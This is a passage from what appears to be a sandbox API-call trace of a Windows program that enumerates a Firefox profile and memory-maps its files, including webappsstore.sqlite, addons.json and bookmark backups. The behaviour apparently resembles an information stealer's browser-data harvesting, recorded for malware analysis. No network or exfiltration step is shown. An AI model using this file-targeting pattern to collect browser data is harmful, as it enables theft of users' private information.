(lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.840] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.840] lstrlenW (lpString="webapps") returned 7 [0589.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.840] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x578b10 [0589.841] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.841] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.841] lstrlenW (lpString="\\*.*") returned 4 [0589.841] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.841] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x59a8a0 [0589.841] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0x57ca60 [0589.841] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.841] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.841] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.841] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.841] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.841] lstrlenW (lpString="\\") returned 1 [0589.841] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.841] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578c40 [0589.841] lstrlenW (lpString="webapps.json") returned 12 [0589.841] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0589.841] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1d10 [0589.841] LocalFree (hMem=0x578c40) returned 0x0 [0589.841] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.841] CloseHandle (hObject=0x4c8) returned 1 [0589.841] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0589.841] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x578c40 [0589.841] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x578c40, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0589.841] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.841] CloseHandle (hObject=0x4c8) returned 1 [0589.841] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.841] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0589.841] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.841] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.842] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.842] CloseHandle (hObject=0x660) returned 1 [0589.842] CloseHandle (hObject=0x4c8) returned 1 [0589.842] LocalFree (hMem=0x578c40) returned 0x0 [0589.842] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.842] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0 [0589.842] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.842] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.842] LocalFree (hMem=0x578b10) returned 0x0 [0589.842] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.842] lstrlenW (lpString="\\") returned 1 [0589.842] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.842] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.842] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0589.842] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.842] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0589.842] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.842] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.842] CloseHandle (hObject=0x5ac) returned 1 [0589.842] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0589.842] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.842] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0589.842] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.842] CloseHandle (hObject=0x5ac) returned 1 [0589.842] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.842] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0589.842] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.843] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.843] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.844] CloseHandle (hObject=0x4c8) returned 1 [0589.844] CloseHandle (hObject=0x5ac) returned 1 [0589.844] LocalFree (hMem=0x56c300) returned 0x0 [0589.844] LocalFree (hMem=0x56afc8) returned 0x0 [0589.844] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 0 [0589.844] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0589.844] LocalFree (hMem=0x5500d0) returned 0x0 [0589.844] LocalFree (hMem=0x5a1300) returned 0x0 [0589.844] lstrlenW (lpString="Profile0") returned 8 [0589.844] LocalFree (hMem=0x2ed9848) returned 0x0 [0589.844] LocalFree (hMem=0x5eb208) returned 0x0 [0589.844] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.844] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0589.844] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.844] lstrlenW (lpString="*.*") returned 3 [0589.844] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.844] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d7c90 [0589.844] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*", lpFindFileData=0x52e004 | out: lpFindFileData=0x52e004) returned 0x57d1e0 [0589.844] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.844] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e004 | out: lpFindFileData=0x52e004) returned 1 [0589.844] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.844] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.844] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e004 | out: lpFindFileData=0x52e004) returned 1 [0589.844] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0589.844] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0589.844] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.844] lstrlenW (lpString="") returned 0 [0589.844] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.844] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ba0 [0589.844] lstrlenW (lpString="Crash Reports") returned 13 [0589.844] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.844] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5a1300 [0589.845] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0589.845] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0589.845] lstrlenW (lpString="\\*.*") returned 4 [0589.845] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0589.845] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0c00 [0589.845] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*", lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 0x57ca60 [0589.845] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.845] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 1 [0589.845] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.845] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.845] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 1 [0589.845] lstrlenW (lpString="\\") returned 1 [0589.845] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0589.845] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0d18 [0589.845] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0589.845] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 64 [0589.845] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.845] LocalFree (hMem=0x5d0d18) returned 0x0 [0589.845] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.845] CloseHandle (hObject=0x4c8) returned 1 [0589.845] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.845] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.845] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 0x5a [0589.845] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.845] CloseHandle (hObject=0x4c8) returned 1 [0589.845] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.845] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa [0589.845] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.845] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.846] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.846] CloseHandle (hObject=0x660) returned 1 [0589.846] CloseHandle (hObject=0x4c8) returned 1 [0589.846] LocalFree (hMem=0x56c300) returned 0x0 [0589.846] LocalFree (hMem=0x56afc8) returned 0x0 [0589.846] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 0 [0589.846] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.846] LocalFree (hMem=0x5d0c00) returned 0x0 [0589.846] LocalFree (hMem=0x5a1300) returned 0x0 [0589.846] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e004 | out: lpFindFileData=0x52e004) returned 1 [0589.846] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0589.846] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0589.846] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.846] lstrlenW (lpString="") returned 0 [0589.846] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.846] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ba0 [0589.846] lstrlenW (lpString="Profiles") returned 8 [0589.846] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.846] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x5a1300 [0589.846] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0589.846] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.846] lstrlenW (lpString="\\*.*") returned 4 [0589.846] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.846] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5500d0 [0589.846] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 0x57ca60 [0589.846] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.846] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 1 [0589.846] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.846] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.846] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 1 [0589.846] lstrcmpiW (lpString1="3y2joh8o.default", lpString2=".") returned 1 [0589.846] lstrcmpiW (lpString1="3y2joh8o.default", lpString2="..") returned 1 [0589.846] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.846] lstrlenW (lpString="\\") returned 1 [0589.846] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.846] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x59a8a0 [0589.847] lstrlenW (lpString="3y2joh8o.default") returned 16 [0589.847] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 59 [0589.847] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x578b10 [0589.847] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.847] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.847] lstrlenW (lpString="\\*.*") returned 4 [0589.847] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.847] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x59a8a0 [0589.847] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 0x57c9a0 [0589.847] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.847] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.847] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.847] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.847] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.847] lstrlenW (lpString="\\") returned 1 [0589.847] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.847] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.847] lstrlenW (lpString="addons.json") returned 11 [0589.847] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.847] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5e1d10 [0589.847] LocalFree (hMem=0x578c30) returned 0x0 [0589.847] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.847] CloseHandle (hObject=0x660) returned 1 [0589.847] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.847] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0589.847] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x578c30, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0589.847] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.847] CloseHandle (hObject=0x660) returned 1 [0589.847] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.847] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0589.847] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.847] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.848] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.848] CloseHandle (hObject=0x668) returned 1 [0589.848] CloseHandle (hObject=0x660) returned 1 [0589.848] LocalFree (hMem=0x578c30) returned 0x0 [0589.848] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.848] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.848] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0589.848] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0589.848] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.848] lstrlenW (lpString="\\") returned 1 [0589.848] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.848] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.848] lstrlenW (lpString="bookmarkbackups") returned 15 [0589.848] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.848] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56afc8 [0589.848] LocalFree (hMem=0x578c30) returned 0x0 [0589.848] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.848] lstrlenW (lpString="\\*.*") returned 4 [0589.848] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.848] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.848] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0x5b9b50 [0589.848] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.848] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0589.848] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.848] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.848] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0589.848] lstrlenW (lpString="\\") returned 1 [0589.848] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.848] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56b3a0 [0589.848] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0589.848] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0589.848] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578c30 [0589.848] LocalFree (hMem=0x56b3a0) returned 0x0 [0589.848] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.849] CloseHandle (hObject=0x668) returned 1 [0589.849] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0589.849] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e1d10 [0589.849] ExpandEnvironmentStringsW (in: 